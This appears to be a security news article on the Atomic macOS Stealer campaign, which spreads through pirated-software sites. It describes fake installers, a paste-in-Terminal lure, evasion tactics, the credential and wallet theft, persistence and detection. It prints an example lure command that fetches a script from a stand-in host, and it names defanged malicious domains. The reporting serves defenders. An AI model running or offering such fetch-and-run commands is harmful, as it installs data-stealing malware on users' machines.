The cybersecurity landscape for macOS users has taken a dangerous turn as cybercriminals increasingly target Apple’s ecosystem with sophisticated malware campaigns.
Atomic macOS Stealer (AMOS), a specialized data-theft malware, has emerged as one of the most significant threats to Mac users, particularly those seeking cracked software applications.
While macOS has historically maintained a reputation as a more secure operating system compared to Windows, this perception is rapidly changing.
The growing popularity of Apple devices among professionals and high-value targets has made the platform increasingly attractive to cybercriminals.
AMOS represents a paradigm shift in Mac-targeted malware, demonstrating that Apple users can no longer rely solely on their operating system’s reputation for security.
Trend Micro has identified and classified this threat as Trojan.MacOS.Amos.PFH, highlighting its significance in the current threat landscape.
The malware specifically targets macOS users through deceptive distribution methods that exploit users’ desire to access expensive software without paying licensing fees.
The AMOS campaign employs two primary infection vectors, both designed to circumvent macOS security features through social engineering rather than technical exploits.
Method 1: Malicious DMG Files
Attackers distribute AMOS through fake cracked applications, particularly targeting users searching for popular software like CleanMyMac.
When victims click “Download for MacOS” on malicious websites, they receive a .dmg installer file with randomized version numbers such as “Installer_v.2.13.dmg” or “Installer_v.7.26.dmg”. These files masquerade as legitimate installers but contain the malicious payload.
However, Apple Gatekeeper technology has proven effective against this distribution method.
On systems running macOS Sequoia, these unsigned .dmg files are automatically blocked, with the system displaying warnings that “Apple could not verify the installer is free of malware.” This represents a significant victory for Apple’s built-in security measures.
Method 2: Terminal Command Injection
The more successful distribution method involves instructing users to execute malicious commands directly in the macOS Terminal.
Historically, the affected users that we investigated visited the website haxmac[.]cc several times in the past month.
.
This technique mirrors the “fake CAPTCHA” approach seen in Windows malware campaigns. Users are presented with what appears to be a verification step, requiring them to copy and paste a command like:
textcurl -fsSL https://malicious-domain.com/install.sh
This method proves highly effective because it bypasses Gatekeeper entirely by having users voluntarily execute the malicious code. The technique exploits user trust and the perceived legitimacy of terminal commands.
Advanced Evasion Techniques
AMOS operators demonstrate sophisticated understanding of cybersecurity defenses through several evasion strategies:
Domain Rotation: The campaign employs constantly changing domains and URLs for download commands, including redirector domains like “dtxxbz1jq070725p93.cfd” and “goipbp9080425d4.cfd”. This technique helps evade static URL-based detection systems and complicates takedown efforts.
Environment Detection: The malware includes anti-analysis features that check for virtualized environments, looking for indicators like “QEMU,” “VMware,” or “KVM” in system profiles. If virtualization is detected, the script exits to avoid analysis by security researchers.
Living-off-the-Land: AMOS heavily utilizes legitimate macOS utilities like osascript, curl, and AppleScript to perform malicious activities, making detection more challenging as these are normal system components.
A Curl command was used to retrieve a file install.sh from letrucvert[.]com; in some cases, it is retrieved from goatramz[.]com.
![Curl command was used to download install.sh from letrucvert[.]com.](https://gbhackers.com/wp-content/uploads/2025/09/fig17-1024x447.png "Atomic Stealer Hidden in Pirated Software 4")
Once successfully installed, AMOS demonstrates extensive data collection capabilities that pose serious privacy and security risks:
Browser Data: The malware targets all major browsers including Chrome, Firefox, Safari, Edge, Opera, Brave, and Vivaldi, stealing saved passwords, cookies, and browsing history.
Cryptocurrency Assets: AMOS specifically targets desktop cryptocurrency wallet applications, attempting to steal wallet files and private keys that could provide access to digital assets.
System Information: The malware collects detailed system profiles, usernames, passwords, and keychain data, providing attackers with comprehensive information about the compromised system.
Personal Files: The stealer searches for and exfiltrates various file types including documents (.txt, .pdf, .docx), wallet files, and database files from common locations like Desktop, Documents, and Downloads folders.
Messaging Applications: AMOS targets Telegram data and other communication platforms, potentially compromising private conversations and contacts.
AMOS establishes persistence through sophisticated methods that ensure continued access even after system reboots.
The malware creates hidden files with names like “.helper” and “.agent” in user directories, then installs a LaunchDaemon configuration file that ensures automatic execution at system startup.
The data exfiltration process involves compressing stolen information into ZIP archives and transmitting them to command-and-control servers via HTTP POST requests.
The malware uses custom headers and encoded identifiers to authenticate transfers and track compromised systems.
Modern endpoint detection and response solutions have proven effective at identifying AMOS infections through behavioral analysis.
Trend Vision One’s Workbench feature has successfully detected campaigns through alerts such as “Possible Credential Access from Web Browsers – MacOS” and “Input Capture via Password Prompt – MacOS.”
These detection capabilities rely on correlating suspicious activities across the attack chain, from initial execution through data exfiltration, providing security teams with comprehensive visibility into the compromise process.
Implications and Future Trends
The AMOS campaign represents a significant evolution in Mac-targeted malware, demonstrating that social engineering remains more effective than technical exploits against modern operating systems.
The threat actors’ quick adaptation from .dmg-based distribution to terminal commands following macOS Sequoia’s enhanced protections shows the dynamic nature of the threat landscape.
Security experts anticipate continued evolution in Mac malware tactics, potentially including increased use of malvertising on legitimate platforms, search engine optimization poisoning to promote fake installers, and more sophisticated abuse of living-off-the-land binaries.
The campaign also highlights the importance of defense-in-depth strategies that don’t rely solely on built-in operating system protections.
While Apple’s Gatekeeper successfully blocked traditional installer-based attacks, the terminal command method proved highly effective in bypassing these protections.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
Source link
